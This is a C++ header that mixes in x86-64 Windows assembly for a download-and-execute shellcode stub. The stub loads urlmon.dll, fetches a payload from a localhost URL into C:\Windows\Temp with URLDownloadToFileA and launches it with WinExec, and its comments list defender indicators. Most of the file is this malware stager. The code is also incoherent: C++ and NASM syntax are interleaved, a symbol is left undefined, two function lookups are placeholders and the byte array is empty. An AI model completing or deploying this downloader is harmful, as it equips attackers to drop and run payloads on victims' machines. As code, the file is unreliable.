#pragma once
#include <cstddef>
// SHELLCODE_START
; Download-and-execute stub, written as a sketch rather than a finished
; routine. Intel operand order, x86-64, Windows: arguments are passed in
; rcx/rdx/r8/r9, which matches the Microsoft x64 convention the Win32 calls
; below rely on. The `[rip + sym]` operands are RIP-relative references to the
; string data at the bottom of this file; which assembler is meant to consume
; this region is not stated on the page.
;
; Assumed entry state (not established in this block; presumably set up by a
; resolver stage that is not shown): rax = LoadLibraryA, rbx = GetProcAddress.
; Bare ";" lines separate stages; the "; Get ... into rax" lines are
; placeholders where the sketch omits the corresponding code.
;
; Defender's note: the chain LoadLibraryA -> GetProcAddress ->
; URLDownloadToFileA -> WinExec -> ExitProcess with a hard-coded URL and a drop
; path under C:\Windows\Temp is the textbook downloader pattern. The four
; literal strings at the bottom of the file are this sample's static
; indicators; the download-to-Temp-then-execute sequence is what behavioral
; detections key on.
;
push rdx
xor rcx, rcx
; dll_list_ptr is not defined anywhere on this page; the existing comment
; suggests it stands for the PEB's loaded-module list — unresolved here.
mov rdx, (dll_list_ptr) ; stub: PEB
;
lea rcx, [rip + urlmon_str]
call rax ; LoadLibraryA("urlmon.dll") → hUrlMon in rax
;
mov rcx, rax ; hUrlMon
lea rdx, [rip + download_str] ; "URLDownloadToFileA"
call rbx ; GetProcAddress → rax
;
lea rcx, [rip + url_str] ; "http://localhost/payload.exe"
lea rdx, [rip + dest_str] ; "C:\\Windows\\Temp\\payload.exe"
xor r8, r8 ; Reserved = 0
xor r9, r9 ; Reserved = 0
call rax ; URLDownloadToFileA
;
lea rcx, [rip + dest_str]
mov edx, 1 ; SW_SHOWNORMAL
; Get WinExec the same way (LoadLibraryA&GetProcAddress as above) into rax
; (placeholder: as written, rax still holds URLDownloadToFileA here)
call rax
;
xor rcx, rcx
; Get ExitProcess into rax
; (placeholder, same as above)
call rax
ret
// SHELLCODE_END
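// Byte image of the stub. The BYTES_BEGIN / BYTES_END marker comments are
// left exactly as they are: presumably a build step assembles the
// SHELLCODE_START / SHELLCODE_END region above and pastes the bytes between
// them (not shown on this page). As checked in, the array is empty.
static const unsigned char code[] = {
// BYTES_BEGIN
// BYTES_END
};
// Size of `code` in bytes (0 while the array is empty). Spelled std::size_t
// because <cstddef> only guarantees the std:: name, not a global size_t.
static const std::size_t codeSize = sizeof(code);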
; NUL-terminated string operands referenced RIP-relatively from the stub
; above (NASM-style `db`). In order: library to load, export to resolve,
; download source, and drop path on disk. For defenders these four literals
; are the static indicators of this sample; "localhost" in the URL suggests a
; lab placeholder rather than a real distribution point — unverified.
urlmon_str: db "urlmon.dll",0
download_str: db "URLDownloadToFileA",0
url_str: db "http://localhost/payload.exe",0
dest_str: db "C:\\Windows\\Temp\\payload.exe",0